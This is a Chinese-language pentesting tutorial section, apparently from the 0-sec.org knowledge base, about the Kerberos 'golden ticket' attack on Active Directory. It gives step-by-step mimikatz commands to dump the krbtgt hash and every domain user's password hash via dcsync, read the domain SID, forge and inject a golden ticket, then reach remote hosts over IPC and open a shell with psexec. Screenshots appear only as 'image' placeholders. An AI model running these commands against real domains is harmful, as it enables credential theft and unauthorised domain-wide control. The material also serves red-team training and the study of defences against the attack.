5.1.2 黄金票据利用

1、导出 krbtgt 密码 hash

mimikatz#lsadump::dcsync /domain:adtest.com /user:krbtgt

image

导出所有域内用户密码 hash 值: 

mimikatz#lsadump::dcsync /domain:adtest.com /all /csv

image

2、获取域 SID

在导出 krbtgt 的 hash 的时候已经包含了域 SID,也可以用以下命令来查看域 SID 

whoami /all

image

3、伪造黄金票据

mimikatz.exe privilege::debug "kerberos::golden /domain:adtest.com /sid:S-1-5-21- 3418659180-3421952656-1938706522 /target:WIN-9P499QKTLDO.ADTEST.COM /service:cifs /rc4: 6f0fdf50f2dcee2fed8e2e3eae7e1592 /user:aaa /ptt"

这里可以不指定 target 和 service

kerberos::golden /domain:adtest.com /sid:S-1-5-21-3418659180-3421952656-
1938706522 /rc4:6f0fdf50f2dcee2fed8e2e3eae7e1592 /user:aaa /ptt

image

使用 klist 查看本地缓存的票据

image

获得票据后可直接通过 dir 远程访问主机,可以直接使用 ipc 进行连接:

image

当然也可以使用 psexec 去获得一个 cmdshell:

image

注:普通黄金票据不能跨域使用;TGT 有效时间为 20 分钟;。

零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2019-12-24 20:14:34

results matching ""

    No results matching ""